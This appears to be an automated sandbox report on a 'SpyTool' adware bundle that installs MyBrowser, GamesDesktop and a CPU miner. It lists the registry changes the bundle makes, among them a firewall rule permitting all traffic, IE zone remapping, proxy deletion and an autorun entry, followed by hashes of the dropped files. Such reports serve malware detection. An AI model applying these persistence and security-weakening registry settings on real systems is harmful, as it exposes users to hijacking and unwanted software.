[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 3D F6 B0 C3 CD A7 A8 A4 9D BC 4C 97 FF FD 14"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process %original file name%.exe:396 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 6E FB C1 96 F0 22 3C B4 E3 0F EF 52 2F 18 84"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process gmsd_re_005010095.exe:1336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E 36 7C 7A 57 FA C9 EB 75 C4 7E 38 63 2E 62 A0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process nst1D.tmp:1520 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 76 AF 80 7C 8C 4B D9 8B 1C FB 10 3C A8 61 46"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process nss2D.tmp:1436 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 7A 40 51 11 50 07 B0 FB 73 F3 55 70 3C EC B9"
The process nss2D.tmp:372 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "15.09.22"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010095]
"PathInstall" = "%Program Files%\gmsd_re_005010095"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"DisplayName" = "GamesDesktop 092.005010095"
"HelpLink" = "http://re.gamesdesktop.com"
"Inno Setup: Icon Group" = "GAMESDESKTOP"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010095"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"Inno Setup: Setup Version" = "5.5.6 (a)"
"Inno Setup: User" = "%CurrentUserName%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"Inno Setup: Language" = "re"
"URLUpdateInfo" = "http://re.gamesdesktop.com"
"URLInfoAbout" = "http://re.gamesdesktop.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\TutoTag]
"OnceInstalled" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010095\unins000.exe"
"InstallLocation" = "%Program Files%\gmsd_re_005010095\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Tinstalls]
"20150923" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 62 BA 88 22 79 66 B8 2F 44 97 13 4C D9 22 98"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"Publisher" = "GAMESDESKTOP"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"QuietUninstallString" = "%Program Files%\gmsd_re_005010095\unins000.exe /SILENT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010095_is1]
"InstallDate" = "20150923"
[HKCU\Software\TutoTag]
"OnceInstalled2" = "re"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010095" = "%Program Files%\gmsd_re_005010095\gmsd_re_005010095.exe"
The SpyTool deletes the following registry key(s):
[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
Dropped PE files
| MD5 | File path |
|---|---|
| 9075c4f875f9eba81949a8dc531da2aa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.exe |
| c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\4895\setup.exe |
| 690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6895.exe |
| 2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
| c0157ad57d34d1d608adea523b228266 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bitool.dll |
| 2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc2B.tmp\registry.dll |
| fce81f5d5e6baabe8eb9f87a1bb3599c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd1B.tmp |
| 8b16108c0c44ded56acac28b90f3d1d2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi39.tmp |
| 9aab96604304c60644a4cd6e798c3936 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjA.tmp |
| 20f288aa7d995a4bfcb240b66383ebf4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm34.tmp |
| 5a239128c89ae851f011ef1536a02cbd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr4.tmp |
| 0116a50101c4107a138a588d1e46fca5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst37.tmp\Banner.dll |
| b140459077c7c39be4bef249c2f84535 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst37.tmp\Math.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst37.tmp\System.dll |
| e541458cfe66ef95ffbea40eaaa07289 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst37.tmp\inetc.dll |
| 0745ff646f5af1f1cdd784c06f40fce9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst37.tmp\md5dll.dll |
| c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst37.tmp\nsDialogs.dll |
| 42df1fbaa87567adf2b4050805a1a545 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst37.tmp\xml.dll |
| f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz10.tmp\inetc.dll |
| 690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe |
| ff7d4d6986b438f0c3c8541171bd3abe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe |
| de1d13fd66394f3169bc06422cd60ea0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_gmsd_re[1].exe |
| c0157ad57d34d1d608adea523b228266 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\BiTool[1].dll |
| ceea099a2589b086940ea7e1333a3ad9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe |
| 5c9336efb1faf577655bcd88a444c26b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\56xtF[1].exe |
| 5925c8698cc2f0f44edc9f5dd61fc7cd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Bundle_CPUminer[1].exe |
| 2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe |
| 8b16108c0c44ded56acac28b90f3d1d2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup[1].exe |
| 20f288aa7d995a4bfcb240b66383ebf4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\smt[1].exe |
| c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
| c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
| e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
| 0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
| 6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
